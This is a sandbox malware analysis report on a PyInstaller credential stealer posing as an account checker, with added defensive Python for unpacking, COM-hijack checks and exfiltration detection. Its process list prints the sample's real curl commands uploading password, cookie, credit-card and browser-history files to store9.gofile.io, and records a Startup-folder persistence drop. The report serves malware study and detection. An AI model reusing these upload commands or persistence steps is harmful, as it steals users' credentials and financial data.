Malware Analysis Report

2024-11-30 13:15

Sample ID: 240620-x569tsxhnm
Target: Multi-Account_checker.zip
SHA256: 05c05cac0f44779afeb7999f88cb9f9e5ffbd7bcc8e737d0fac13261e2df4973
Tags: persistence privilege_escalation spyware stealer pyinstaller
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview; Signatures)
Analysis: behavioral6, behavioral8, behavioral9, behavioral10, behavioral11, behavioral13, behavioral3, behavioral4, behavioral16, behavioral17, behavioral12, behavioral15, behavioral5, behavioral14, behavioral2, behavioral7, behavioral18, behavioral1 (each with Detonation Overview; Command Line; Signatures; Processes; Network; Files)

Of these, only static1, behavioral6 and behavioral8 are reproduced in this copy of the report.

Analysis Overview

Score: 7/10

SHA256: 05c05cac0f44779afeb7999f88cb9f9e5ffbd7bcc8e737d0fac13261e2df4973

Threat Level: Shows suspicious behavior (the verdict assigned to Multi-Account_checker.zip).

Malicious Activity Summary

Tags: persistence privilege_escalation spyware stealer pyinstaller

Signatures triggered across the static and behavioral analyses:

Loads dropped DLL
Drops startup file
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Event Triggered Execution: Component Object Model Hijacking
Detects Pyinstaller
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Enumerates processes with tasklist
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-20 19:27

Signatures

Detects Pyinstaller (tag: pyinstaller)
    Description / Indicator / Process / Target: none recorded (static match only).

Unsigned PE
    Description / Indicator / Process / Target: none recorded; the report does not name which PE inside the archive is unsigned.
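The static signature only says the sample is a PyInstaller bundle; what an analyst needs next is the entry script packed into the archive that the one-file bootloader appends to the EXE (the files in _MEI49362 listed under Files in behavioral8 are the runtime it extracts, not that script). The Python below is an added example, not code from this report or from the sample: it reads the PyInstaller package cookie and table of contents, extracts the entry-point script and checks it for the network indicators this report records. The sample image, its entry names and the script text are constructed for the demonstration; pass the bytes of the real Multi-Checker.exe to parse_package to list its entries. Real 's' entries hold a marshalled code object rather than source text, but string constants sit in it verbatim, so the byte search in triage still applies.

```python
import struct
import zlib
from dataclasses import dataclass

# PyInstaller one-file layout (PyInstaller/archive/writers.py): the bootloader EXE is followed
# by a package of [entry data][table of contents][88-byte cookie]. TOC offsets are relative
# to the start of the package; the cookie's length field locates that start.
MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"               # magic, package length, TOC offset, TOC length, python version, python DLL
COOKIE_LEN = struct.calcsize(COOKIE_FMT)    # 88
ENTRY_FMT = "!iIIIBc"                   # header length, data offset, compressed size, uncompressed size, zlib flag, type code
ENTRY_LEN = struct.calcsize(ENTRY_FMT)      # 18
TYPE_CODES = {"s": "entry script", "m": "module", "z": "PYZ archive", "b": "binary", "x": "data", "o": "runtime option"}


@dataclass
class Entry:
    name: str
    type_code: str
    offset: int
    compressed: int
    uncompressed: int
    is_zlib: bool


@dataclass
class Package:
    start: int
    pyvers: int
    pylib: str
    entries: list


def parse_package(image: bytes) -> Package:
    """Find the trailing cookie in a PyInstaller-built EXE and read its table of contents."""
    cookie_pos = image.rfind(MAGIC)
    if cookie_pos < 0:
        raise ValueError("no PyInstaller cookie found")
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FMT, image[cookie_pos:cookie_pos + COOKIE_LEN])
    start = cookie_pos + COOKIE_LEN - pkg_len           # the package ends with the cookie
    toc = image[start + toc_off:start + toc_off + toc_len]
    entries, pos = [], 0
    while pos + ENTRY_LEN <= len(toc):
        hdr_len, off, clen, ulen, flag, code = struct.unpack(ENTRY_FMT, toc[pos:pos + ENTRY_LEN])
        if hdr_len < ENTRY_LEN:
            raise ValueError("corrupt TOC entry")
        name = toc[pos + ENTRY_LEN:pos + hdr_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append(Entry(name, code.decode(), off, clen, ulen, bool(flag)))
        pos += hdr_len
    return Package(start, pyvers, pylib.rstrip(b"\0").decode(), entries)


def extract(image: bytes, pkg: Package, entry: Entry) -> bytes:
    raw = image[pkg.start + entry.offset:pkg.start + entry.offset + entry.compressed]
    return zlib.decompress(raw) if entry.is_zlib else raw


def triage(image: bytes, markers=(b"gofile.io", b"discord.com", b"api.ipify.org")):
    """Return the package and, for each entry script, which of the report's indicators it contains."""
    pkg = parse_package(image)
    hits = {e.name: sorted(m.decode() for m in markers if m in extract(image, pkg, e))
            for e in pkg.entries if e.type_code == "s"}
    return pkg, hits


def build_package(entries, pyvers=311, pylib=b"python311.dll") -> bytes:
    """Write a package in the same layout; used here only to construct the sample image."""
    body, toc = bytearray(), bytearray()
    for name, code, data, compress in entries:
        blob = zlib.compress(data) if compress else data
        name_b = name.encode() + b"\0"
        hdr_len = ENTRY_LEN + len(name_b)
        hdr_len += (-hdr_len) % 16                      # headers are padded to a 16-byte boundary
        toc += struct.pack(ENTRY_FMT, hdr_len, len(body), len(blob), len(data), int(compress), code.encode())
        toc += name_b.ljust(hdr_len - ENTRY_LEN, b"\0")
        body += blob
    cookie = struct.pack(COOKIE_FMT, MAGIC, len(body) + len(toc) + COOKIE_LEN, len(body), len(toc), pyvers, pylib)
    return bytes(body + toc + cookie)


# Constructed sample: a stand-in PE stub plus a package holding a bootstrap module, the entry
# script and a PYZ placeholder. The script text is invented for the demo, not the sample's code.
SAMPLE_SCRIPT = (b"import subprocess\n"
                 b'subprocess.run(["curl", "-F", "file=@crpasswords.txt", "https://store9.gofile.io/uploadFile"])\n')
SAMPLE_IMAGE = b"MZ" + b"\0" * 62 + build_package([
    ("pyiboot01_bootstrap", "m", b"# bootstrap placeholder", True),
    ("Multi-Checker", "s", SAMPLE_SCRIPT, True),
    ("PYZ-00.pyz", "z", b"PYZ\0", False),
])

if __name__ == "__main__":
    pkg, hits = triage(SAMPLE_IMAGE)
    print(f"python {pkg.pyvers} ({pkg.pylib}), {len(pkg.entries)} entries")
    for e in pkg.entries:
        print(f"  {e.type_code} {TYPE_CODES.get(e.type_code, '?'):13} {e.name} ({e.uncompressed} bytes)")
    print("indicators:", hits)
```

The parser searches backwards for the cookie rather than assuming it occupies the last 88 bytes, which is what the PyInstaller bootloader itself does and what keeps it working when data follows the package; an unsigned PE like this one has nothing after it. Once the entry names are known, the 'z' entry is the PYZ archive holding the bundled modules and the 's' entries are the scripts to decompile.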

Analysis: behavioral6

Detonation Overview

Submitted: 2024-06-20 19:27
Reported: 2024-06-20 19:33
Platform: win10v2004-20240508-en
Max time kernel: 233s
Max time network: 246s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking (tags: persistence privilege_escalation)

Modifies registry class

Both signatures are driven by the same registry writes. All were made by C:\Windows\system32\regsvr32.exe (no target recorded), grouped here by key; \REGISTRY\MACHINE is HKLM and \REGISTRY\USER\<SID>_Classes is that user's HKCU\Software\Classes hive:

HKLM\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}
    key created; (Default) = "PSFactoryBuffer"
HKLM\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32
    key created; (Default) = "C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll"; ThreadingModel = "Both"
HKLM\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}
    key created; (Default) = "nsIMapi"
HKLM\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32
    key created; (Default) = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}"
HKLM\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods
    key created; (Default) = "16"
HKU\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\CLSID
    key created
HKU\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Interface
    key created

Reading these: a PSFactoryBuffer class, an Interface entry whose ProxyStubClsid32 points back at the same GUID, and a NumMethods value are exactly what a COM proxy/stub DLL writes when regsvr32 calls its DllRegisterServer, and the interface name nsIMapi together with the file name is consistent with the Simple MAPI proxy DLL that Mozilla Thunderbird installs as MapiProxy_InUse.dll. The hijacking signature fires because, after this call, an HKLM CLSID's InProcServer32 resolves to a DLL in a user's Temp directory, so any process that instantiates the class loads whatever DLL is at that path. Before counting this detonation as attacker persistence, check whether the DLL carries a valid Mozilla signature (static1 reports an unsigned PE without naming the file) and whether anything in the archive actually instantiates the CLSID.
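To turn the registry rows above into a repeatable check, the following Python is an added example (not code from the report or from any sandbox): it parses rows in the report's "Set value" shape, pairs each CLSID's InProcServer32 (Default) value with the class's own (Default) name, and flags servers that resolve into user-writable directories or are not drive-qualified, recording whether the class is a PSFactoryBuffer proxy/stub so the reviewer can weigh ordinary self-registration against a planted server. The rows are copied from this detonation; the "Key created" row is included to show non-matching rows are skipped, and the final benign row, the function names and the Finding type are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed input: "Set value" rows copied from this detonation in the report's
# 'Set value (type) <key>\<value> = "<data>" <process> <target>' shape, one "Key created"
# row (skipped by the parser), and one benign row that is NOT from the report.
SAMPLE_EVENTS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy_InUse.dll" C:\Windows\system32\regsvr32.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A',
    # benign, constructed for the negative case: a server under a protected system directory
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32\ = "C:\\Windows\\System32\\example.dll" C:\Windows\system32\regsvr32.exe N/A',
]

SET_VALUE_RE = re.compile(r'^Set value \((\w+)\) (\\REGISTRY\\.+?) = "(.*)" (\S+) (\S+)$')
INPROC_RE = re.compile(r"\\CLSID\\(\{[0-9A-F-]{36}\})\\InProcServer32$", re.I)
CLSID_RE = re.compile(r"\\CLSID\\(\{[0-9A-F-]{36}\})$", re.I)


def parse_set_value(line):
    """(key, value_name, data, process) for a 'Set value' row; None for any other row."""
    m = SET_VALUE_RE.match(line)
    if not m:
        return None
    _, path, data, process, _ = m.groups()
    key, _, value_name = path.rpartition("\\")       # trailing backslash means the (Default) value
    return key, value_name, data.replace("\\\\", "\\"), process


def in_user_writable_dir(path):
    """Directories an unprivileged user can write to, so the DLL there can be swapped at will."""
    p = path.lower()
    return p.startswith("c:\\users\\") or "\\programdata\\" in p or "\\temp\\" in p


@dataclass
class Finding:
    hive: str          # HKLM, or HKU for a per-user Classes hive (which wins over HKLM for the same CLSID)
    clsid: str
    dll: str
    process: str
    proxy_stub: bool   # class (Default) is "PSFactoryBuffer": a proxy/stub DLL registering itself
    reason: str


def find_com_hijacks(lines):
    servers, class_names = {}, {}
    for line in lines:
        parsed = parse_set_value(line)
        if not parsed:
            continue
        key, value_name, data, process = parsed
        if value_name:                                # only (Default) values name the server / class
            continue
        if m := INPROC_RE.search(key):
            servers[m[1].upper()] = (key, data, process)
        elif m := CLSID_RE.search(key):
            class_names[m[1].upper()] = data
    findings = []
    for clsid, (key, dll, process) in servers.items():
        if not re.match(r"^[a-z]:\\", dll, re.I):
            reason = "server path is not drive-qualified and will be resolved through the DLL search order"
        elif in_user_writable_dir(dll):
            reason = "InProcServer32 resolves to a DLL in a user-writable directory"
        else:
            continue
        hive = "HKLM" if key.upper().startswith("\\REGISTRY\\MACHINE\\") else "HKU"
        findings.append(Finding(hive, clsid, dll, process, class_names.get(clsid) == "PSFactoryBuffer", reason))
    return findings


if __name__ == "__main__":
    for f in find_com_hijacks(SAMPLE_EVENTS):
        kind = "proxy/stub self-registration" if f.proxy_stub else "COM server"
        print(f"{f.hive} {f.clsid} -> {f.dll} ({kind}, written by {f.process}): {f.reason}")
```

The same two tests (user-writable path, missing drive letter) apply unchanged to a live host if the rows come from a registry walk instead of a sandbox report; the proxy_stub flag is there so that a genuine Thunderbird-style self-registration is triaged as "verify the DLL's signature" rather than dismissed or escalated on the CLSID alone.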

Processes

C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Network

None recorded.

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted: 2024-06-20 19:27
Reported: 2024-06-20 19:33
Platform: win10v2004-20240611-en
Max time kernel: 234s
Max time network: 255s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

Signatures

Drops startup file

File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Multi-Checker.exe, by C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe (no target recorded).

Loads dropped DLL

47 load events by C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe; the report records no indicator or target for any of them. The count is consistent with the PyInstaller runtime files extracted to _MEI49362 (see Files below).

Reads user/profile data of web browsers (tags: spyware stealer)

Accesses cryptocurrency files/wallets, possible credential harvesting (tag: spyware)

Legitimate hosting services abused for malware hosting/C2

25 events, indicator discord.com (no description, process or target recorded).

Looks up external IP address via web service

2 events, indicator api.ipify.org (no description, process or target recorded).

Enumerates processes with tasklist

Process: C:\Windows\system32\tasklist.exe (no indicator or target recorded).

Suspicious use of AdjustPrivilegeToken

Token: SeDebugPrivilege, process C:\Windows\system32\tasklist.exe. tasklist enables this privilege itself in order to query other processes, so this row reflects the tasklist call above rather than a privilege change by the sample.

Suspicious use of WriteProcessMemory

The report lists every parent/child pair twice; duplicates are collapsed here. Each write goes from a parent into a child it spawned, which is what process creation looks like to this signature, and no write into an unrelated, pre-existing process is recorded. Read top to bottom, the rows are the process tree: the one-file bootloader (4936) starts a second copy of itself (3480), which runs each command through its own cmd.exe.

PID 4936 Multi-Checker.exe -> PID 3480 Multi-Checker.exe
PID 3480 Multi-Checker.exe -> PID 1312 cmd.exe
PID 3480 Multi-Checker.exe -> PID 1372 cmd.exe
PID 1372 cmd.exe -> PID 2072 tasklist.exe
PID 3480 Multi-Checker.exe -> PID 964 cmd.exe
PID 964 cmd.exe -> PID 4420 curl.exe
PID 3480 Multi-Checker.exe -> PID 3040 cmd.exe
PID 3040 cmd.exe -> PID 2340 curl.exe
PID 3480 Multi-Checker.exe -> PID 2392 cmd.exe
PID 2392 cmd.exe -> PID 4128 curl.exe
PID 3480 Multi-Checker.exe -> PID 1684 cmd.exe
PID 1684 cmd.exe -> PID 4068 curl.exe
PID 3480 Multi-Checker.exe -> PID 3656 cmd.exe
PID 3656 cmd.exe -> PID 1780 curl.exe
PID 3480 Multi-Checker.exe -> PID 3664 cmd.exe
PID 3664 cmd.exe -> PID 5088 curl.exe
PID 3480 Multi-Checker.exe -> PID 2500 cmd.exe
PID 2500 cmd.exe -> PID 2468 curl.exe

(Multi-Checker.exe is C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe; cmd.exe, tasklist.exe and curl.exe are under C:\Windows\system32.)

Processes

Listed in the order the report gives them, each path followed by its command line. The parent/child relationships are those recorded under "Suspicious use of WriteProcessMemory" above. The msedge.exe utility process appears in no parent/child record, so nothing in the report ties it to the sample.

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe
    "C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe
    "C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe
    tasklist

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4012,i,8998666007764333392,14724298544432336038,262144 --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:8

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.midi" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin/Downloads/RenameMove.midi" https://store9.gofile.io/uploadFile
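The process list above is flat; the parent/child pairs that the WriteProcessMemory signature records are what link each curl upload back to the sample. The Python below is an added example (not the report's or the sample's code) that rebuilds the tree from rows in the report's "PID X wrote to memory of Y" shape, extracts the curl -F file uploads and their destination hosts, walks each uploader back to its root image, and flags the Startup-folder drop from the "File created" row. The rows are copied from this detonation; the PID-to-command-line pairing is an assumption made for the example, since the report lists command lines without PIDs, and the function and type names are constructed here.

```python
import re
from dataclasses import dataclass

# Constructed input copied from this detonation's rows. The first pair is repeated, as it is
# in the report, to show that duplicate rows do not create extra edges.
WPM_ROWS = [
    r"PID 4936 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe",
    r"PID 4936 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe",
    r"PID 3480 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 3480 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 1372 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe",
    r"PID 3480 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 964 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe",
    r"PID 3480 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 3040 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe",
    r"PID 3480 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 2392 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe",
    r"PID 3480 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 1684 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe",
    r"PID 3480 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 3656 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe",
    r"PID 3480 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 3664 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe",
    r"PID 3480 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe",
    r"PID 2500 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe",
]
FILE_ROWS = [
    r"File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Multi-Checker.exe C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A",
]
# ASSUMPTION: the report gives command lines without PIDs; they are paired here by order of appearance.
CMDLINES = {
    4936: r'"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"',
    3480: r'"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"',
    1312: r'C:\Windows\system32\cmd.exe /c "ver"',
    1372: r'C:\Windows\system32\cmd.exe /c "tasklist"',
    2072: r"tasklist",
    4420: r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile',
    2340: r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile',
    4128: r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile',
    4068: r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile',
    1780: r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile',
    5088: r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile',
    2468: r'curl -F "file=@C:\Users\Admin/Downloads/RenameMove.midi" https://store9.gofile.io/uploadFile',
}

WPM_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
FILE_RE = re.compile(r"^File created (.+?) (\S+) N/A$")
CURL_UPLOAD_RE = re.compile(r'curl\s+-F\s+"file=@([^"]+)"\s+(https?://([^/\s]+)\S*)')
ABUSED_HOSTS = ("gofile.io", "discord.com")     # hosts the report names as abused, plus the curl target
STARTUP_MARKER = "\\start menu\\programs\\startup\\"


def parse_edges(rows):
    """child PID -> parent PID and PID -> image path, from WriteProcessMemory rows."""
    parent_of, image = {}, {}
    for row in rows:
        m = WPM_RE.match(row)
        if not m:
            continue
        ppid, cpid = int(m[1]), int(m[2])
        parent_of[cpid] = ppid                    # a repeated row rewrites the same edge
        image[ppid], image[cpid] = m[3], m[4]
    return parent_of, image


def ancestry(pid, parent_of):
    """PIDs from pid up to the root, e.g. curl -> cmd -> child -> bootloader."""
    chain = [pid]
    while chain[-1] in parent_of and len(chain) < 64:   # bound guards against cyclic input
        chain.append(parent_of[chain[-1]])
    return chain


def host_matches(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


@dataclass
class Exfil:
    pid: int
    local_file: str
    host: str
    url: str
    chain: list
    root_image: str


def find_exfil(rows, cmdlines):
    """curl multipart uploads to abused hosts, each tied to the process that started the chain."""
    parent_of, image = parse_edges(rows)
    hits = []
    for pid, cmd in cmdlines.items():
        m = CURL_UPLOAD_RE.search(cmd)
        if not m or not host_matches(m[3].lower(), ABUSED_HOSTS):
            continue
        chain = ancestry(pid, parent_of)
        hits.append(Exfil(pid, m[1], m[3].lower(), m[2], chain, image.get(chain[-1], "unknown")))
    return hits


def startup_drops(file_rows):
    """(dropped path, writing process) for files created in a Startup folder."""
    return [(m[1], m[2]) for m in map(FILE_RE.match, file_rows) if m and STARTUP_MARKER in m[1].lower()]


if __name__ == "__main__":
    for e in find_exfil(WPM_ROWS, CMDLINES):
        print(f"{e.local_file} -> {e.url} via PIDs {e.chain}, rooted at {e.root_image}")
    for path, proc in startup_drops(FILE_ROWS):
        print(f"persistence: {proc} wrote {path}")
```

Walking the chain is what lets a detection say "a binary running from a user's Temp directory uploaded a file named crpasswords.txt to gofile.io" instead of merely "curl contacted gofile.io"; the latter also matches a user sharing a file by hand. The host check uses a dot-anchored suffix match so that store9.gofile.io matches but a look-alike such as evilgofile.io does not.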

Network

Destinations tied to the signatures and command lines above: api.ipify.org (external IP lookup), api.gofile.io and store9.gofile.io (the curl uploads), and discord.com (25 events). geolocation-db.com also appears but is not attributed to any process elsewhere in the report. The in-addr.arpa queries are reverse lookups of the addresses contacted, and the bing.com and bing.net connections are not attributed to the sample by any signature.

Country Destination Domain Proto
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 200.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
